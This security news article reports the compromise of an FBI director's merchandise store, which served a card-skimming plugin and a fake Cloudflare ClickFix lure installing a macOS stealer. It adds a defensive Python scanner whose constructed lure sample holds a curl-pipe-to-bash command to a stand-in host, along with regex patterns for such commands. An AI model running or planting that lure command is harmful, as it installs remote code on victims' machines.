
FBI director Kash Patel’s brand website taken offline after malware reports


FBI director site went offline after a hack used a fake Cloudflare page to trick users into running a ClickFix attack that installed malware.

The merchandise website of FBI director Kash Patel (basedapparel[.]com) was taken offline on Friday after reports that it had been compromised by hackers who were using it to spread malware. The malware was discovered on Thursday by a user known as “debbie,” described as a “big time nerd.”

Visitors were instructed to copy a code from the website and paste it into their computer’s terminal, a social engineering method known as a ClickFix attack. Once executed, the Mac-specific code would download and install malware on the device.

A ClickFix attack is a social engineering technique that manipulates users into running malicious commands themselves, typically by posing as a fix for a problem or verification step, ultimately leading to malware installation or system compromise.

“A website that sells merchandise related to FBI Director Kash Patel went offline Friday after a hack apparently tricked visitors into downloading malware,” reports the website Straight Arrow News. “Visitors were then prompted to copy a code from the website and paste it into the terminal on their computers, a social engineering technique known as a ClickFix attack. When entered, the code, designed specifically for Mac computers, would download and install malware onto the user’s devices.”

At this time, the site is still offline.

The researcher who uses the X handle WifiRumHam analyzed the compromised website. The e-store runs the WordPress plug-in WooCommerce and was serving a multi-part malware attack: a malicious plugin installed on the site both steals payment data and targets macOS users with a fake Cloudflare CAPTCHA (the “ClickFix” lure) that tricks them into running hidden malicious commands.

If executed, the commands download a script-based macOS stealer that evades standard security protections and can steal browser data, passwords, and cryptocurrency wallet information. It targets many popular browsers and wallet apps, collects the data, compresses it, and sends it to a remote server before deleting itself.

The campaign appears to be widespread, with similar infections seen across many websites.
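The lure described above (a fake Cloudflare verification page that copies a command to the clipboard and tells the visitor to paste it into Terminal) has a recognisable shape, so a site owner or responder can triage pages for it. The following scanner is an added example for this article, not the researcher's tooling; the indicator list and all HTML samples are constructed for illustration.

```python
"""Heuristic scanner for ClickFix-style lure pages: a fake Cloudflare-looking
"verify you are human" page that copies a shell command to the clipboard and
tells the visitor to paste it into Terminal. Added example for this article,
not the researcher's tooling; the HTML samples below are constructed."""
import re
from dataclasses import dataclass, field

# Indicator families seen in ClickFix lures; each is weak alone, the verdict needs several.
INDICATORS = {
    "fake_verification_text": re.compile(
        r"verify you are human|checking your browser|ray id", re.I),
    "clipboard_write": re.compile(
        r"clipboard\.writeText|execCommand\(\s*['\"]copy", re.I),
    "terminal_instruction": re.compile(
        r"\b(open|launch|paste)\b.{0,40}\b(terminal|cmd\.exe|run dialog|win\s*\+\s*r)\b", re.I),
    "pipe_to_shell": re.compile(
        r"(curl|wget)[^\n\"']{0,120}\|\s*(ba|z)?sh\b|base64\s+(-d|--decode)", re.I),
}

@dataclass
class Verdict:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= 3

def scan_html(html: str) -> Verdict:
    """Score one page body; returns the matched indicator names and a score."""
    v = Verdict()
    for name, rx in INDICATORS.items():
        if rx.search(html):
            v.hits.append(name)
            v.score += 1
    # A genuine browser challenge never writes to the clipboard; verification
    # wording paired with a clipboard write is the core ClickFix tell, so weight it.
    if {"fake_verification_text", "clipboard_write"} <= set(v.hits):
        v.score += 1
    return v

# Constructed samples (not content from the compromised store).
LURE = """<h1>Checking your browser before accessing shop.invalid</h1><p>Ray ID: 0000</p>
<button onclick="navigator.clipboard.writeText(cmd)">Verify you are human</button>
<p>Step 2: Open Terminal (press Cmd+Space, type Terminal), paste and hit Enter.</p>
<script>var cmd = "curl -s https://lure.invalid/x | bash";</script>"""
BENIGN_SHOP = '<button onclick="navigator.clipboard.writeText(code)">Copy coupon code</button>'
REAL_CHALLENGE = """<h1>Checking your browser before accessing shop.invalid</h1>
<p>Ray ID: 1234</p><noscript>Enable JavaScript and cookies to continue.</noscript>"""
```

Run `scan_html` over each page body a store serves (or over plugin output on disk) and review anything with `suspicious` set; a legitimate copy-to-clipboard widget or a real challenge page scores 1 and stays below the threshold.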

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, FBI director)
